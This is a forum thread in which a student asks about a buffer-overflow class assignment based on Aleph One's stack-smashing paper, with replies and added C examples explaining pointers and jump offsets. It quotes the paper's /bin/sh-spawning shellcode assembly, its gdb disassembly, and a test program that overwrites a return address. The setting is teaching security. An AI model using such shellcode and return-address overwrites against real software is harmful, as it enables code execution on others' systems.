Buffer Overflow Assignment

1 reply to this topic

#1 Ziggy54354 (OCC's Sexiest Asian, Members, 1495 posts)
Posted 13 March 2008 - 04:26 PM

My prof decided to give us a buffer overflow assignment for my comp security class... a lot of how it works deals with assembly language and C (never learned C... seeing as our curriculum is primarily Java based... go figure). We were given this site http://insecure.org/...smashstack.html and on it is the following:

Looks good. To make sure it works correctly we must compile it and run it.
But there is a problem. Our code modifies itself, but most operating systems
mark code pages read-only. To get around this restriction we must place the
code we wish to execute in the stack or data segment, and transfer control
to it. To do so we will place our code in a global array in the data
segment. We need first a hex representation of the binary code. Let's
compile it first, and then use gdb to obtain it.

/* shellcodeasm.c: the __asm__ wrapper around the instructions was lost when
   the post was pasted; it is restored here with one string literal per line
   (the "# n bytes" notes are assembler comments and were in the original) */
void main() {
__asm__(
"        jmp     0x2a                    # 3 bytes\n"
"        popl    %esi                    # 1 byte\n"
"        movl    %esi,0x8(%esi)          # 3 bytes\n"
"        movb    $0x0,0x7(%esi)          # 4 bytes\n"
"        movl    $0x0,0xc(%esi)          # 7 bytes\n"
"        movl    $0xb,%eax               # 5 bytes\n"
"        movl    %esi,%ebx               # 2 bytes\n"
"        leal    0x8(%esi),%ecx          # 3 bytes\n"
"        leal    0xc(%esi),%edx          # 3 bytes\n"
"        int     $0x80                   # 2 bytes\n"
"        movl    $0x1, %eax              # 5 bytes\n"
"        movl    $0x0, %ebx              # 5 bytes\n"
"        int     $0x80                   # 2 bytes\n"
"        call    -0x2f                   # 5 bytes\n"
"        .string \"/bin/sh\"             # 8 bytes\n"
);
}

[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: jmp 0x800015f <main+47>
0x8000135 <main+5>: popl %esi
0x8000136 <main+6>: movl %esi,0x8(%esi)
0x8000139 <main+9>: movb $0x0,0x7(%esi)
0x800013d <main+13>: movl $0x0,0xc(%esi)
0x8000144 <main+20>: movl $0xb,%eax
0x8000149 <main+25>: movl %esi,%ebx
0x800014b <main+27>: leal 0x8(%esi),%ecx
0x800014e <main+30>: leal 0xc(%esi),%edx
0x8000151 <main+33>: int $0x80
0x8000153 <main+35>: movl $0x1,%eax
0x8000158 <main+40>: movl $0x0,%ebx
0x800015d <main+45>: int $0x80
0x800015f <main+47>: call 0x8000135 <main+5>
0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>: das
0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>: 0xeb
0x8000134 <main+4>: 0x2a

/* testsc.c as pasted into the post */
char shellcode[] =
        /* the "\x.." hex string that initialised this array did not survive the paste */

void main() {
int *ret;

ret = (int *)&ret + 2;      /* two words above the local: where the return address lives */
(*ret) = (int)shellcode;    /* overwrite it with the address of the array */
}

[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit

First question... where the heck did the hex stuff in char shellcode[] come from?
Second question... what is the main doing? Like I said, I'm not familiar with the syntax in C, so I'm not sure what putting a * next to a variable does or what the & sign does.

Edited by Ziggy54354, 13 March 2008 - 04:28 PM.

Current Rig:

Intel E8400 4ghz | DFI Blood-Iron P35 | EVGA 9800GTX+
2x 320GB Seagate 1x 500GB Seagate 1x 1.5TB Seagate | 4GB G.Skill pc8000 PQ

Ubuntu Rig:

AXP 1.4ghz 200FSB 7x | Abit NF-7s | 6800GS
200GB Seagate | 1gb Corsair XMS pc3200 2-2-2-11
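On the first question, an added example (my own code, not Aleph One's and not from the post): the hex in char shellcode[] is nothing more than the raw bytes of the compiled function, which is exactly what gdb's `x/bx main+3` prints (0xeb 0x2a for the jmp). The block below formats bytes as the `\x..` string literal the paper pastes into the array, and checks the two relative-offset instructions against the disassembly in the post: the displacement of a jmp or call is added to the address of the *next* instruction, so `eb 2a` at 0x8000133 (two bytes, main+3 to main+5) lands on 0x800015f (<main+47>), and the five-byte call at 0x800015f reaches 0x8000135 (<main+5>) with displacement -0x2f, which is the `call -0x2f` written in the source. The addresses come from the gdb dump above; the two-byte sample is constructed from it.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Target of a relative jmp/call: the displacement is added to the address of
 * the next instruction (insn_addr + insn_len), not to the jmp itself. */
uint32_t rel_target(uint32_t insn_addr, unsigned insn_len, int32_t disp) {
    return insn_addr + insn_len + (uint32_t)disp;
}

/* Inverse: displacement needed to reach `target` from the instruction at insn_addr. */
int32_t rel_disp(uint32_t insn_addr, unsigned insn_len, uint32_t target) {
    return (int32_t)(target - (insn_addr + insn_len));
}

/* Render raw bytes the way the paper pastes them into char shellcode[]:
 * "\xeb\x2a...". Returns the number of characters written (excluding NUL). */
size_t bytes_to_c_literal(const unsigned char *b, size_t n, char *out, size_t outsz) {
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        if (pos + 5 > outsz)          /* each byte needs 4 chars plus the NUL */
            break;
        pos += (size_t)snprintf(out + pos, outsz - pos, "\\x%02x", b[i]);
    }
    return pos;
}

/* The two bytes gdb showed for `x/bx main+3`, as a C literal (sample constructed
 * from the post's gdb session). */
const char *jmp_bytes_literal(void) {
    static const unsigned char jmp_bytes[2] = { 0xeb, 0x2a };
    static char lit[16];
    bytes_to_c_literal(jmp_bytes, sizeof jmp_bytes, lit, sizeof lit);
    return lit;                        /* "\xeb\x2a" */
}

int main(void) {
    printf("jmp opcode bytes as C literal: \"%s\"\n", jmp_bytes_literal());
    /* jmp at 0x8000133 is 2 bytes long, disp8 = 0x2a -> 0x800015f (<main+47>) */
    printf("jmp target: 0x%x\n", rel_target(0x8000133u, 2, 0x2a));
    /* call at 0x800015f is 5 bytes, lands on 0x8000135 (<main+5>) -> disp = -0x2f */
    printf("call disp:  %d (-0x2f)\n", rel_disp(0x800015fu, 5, 0x8000135u));
    return 0;
}
```

The byte-length of each instruction is what the address deltas in the disassembly give you (main+3 to main+5 is two bytes), and that is also how the paper's `-0x2f` was worked out: count back from the end of the call to the popl.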

#2 Waco (Lab Rat 2, Members, 16508 posts, Gender: Male, Location: Los Alamos, NM)

Posted 13 March 2008 - 04:49 PM

I'm not familiar with the syntax in C so I'm not sure what putting a * next to a variable does or what the & sign does.

When declaring variables (like int * foo) the * makes that variable a pointer. If used inline with code, it dereferences the pointer.

& grabs the address of whatever it's used on (i.e., &foo grabs the address of the variable foo).

Tolerance is a sign of weakness.
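Waco's explanation as a small added C example (mine, not his, and not from the paper), with the expression from the post's testsc.c replayed on a constructed array instead of the live stack. The three slots stand in for the standard 32-bit frame layout the paper relies on, an assumption stated here rather than spelled out in the thread: slot 0 is the local variable `ret`, slot 1 the saved frame pointer, slot 2 the saved return address, which is why `(int *)&ret + 2` lands on the return address.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>

/* `*` in a declaration makes a pointer; `&x` takes the address of x;
 * `*p` in an expression reads or writes whatever p points at. */
int write_through_pointer(void) {
    int x = 1;
    int *p = &x;        /* p now holds the address of x */
    *p = 42;            /* dereference: stores 42 into x, not into p */
    return (p == &x) ? x : -1;   /* 42 */
}

/* Pointer arithmetic is scaled by the pointee size: p + 2 on an int*
 * advances 2 * sizeof(int) bytes, which is why the paper calls it "two words". */
size_t bytes_skipped_by_plus_two(void) {
    int arr[4] = { 0, 0, 0, 0 };
    int *p = arr;
    return (size_t)((char *)(p + 2) - (char *)p);   /* 8 where int is 4 bytes */
}

/* What `ret = (int *)&ret + 2; *ret = value;` does, replayed on a constructed
 * array standing in for the frame (local, saved frame pointer, return address)
 * rather than on the real stack. Returns the slot that ends up overwritten. */
uint32_t overwrite_two_words_up(uint32_t value) {
    uint32_t frame[3] = { 0xAAAAAAAAu,    /* slot 0: the local variable `ret` */
                          0xBBBBBBBBu,    /* slot 1: saved frame pointer      */
                          0xCCCCCCCCu };  /* slot 2: saved return address     */
    uint32_t *ret = (uint32_t *)&frame[0] + 2;   /* same arithmetic as the paper */
    *ret = value;                                /* writes slot 2 only */
    return frame[2];
}

int main(void) {
    printf("x after *p = 42:            %d\n", write_through_pointer());
    printf("bytes moved by p + 2:       %zu\n", bytes_skipped_by_plus_two());
    printf("slot 2 after the overwrite: 0x%08x\n", overwrite_two_words_up(0x12345678u));
    return 0;
}
```

Reading the post's main with this in mind: `int *ret;` declares a pointer, `&ret` is the address of that pointer on the stack, the cast makes the `+ 2` count in int-sized steps, and the final `(*ret) = ...` writes through the pointer into the slot it now names.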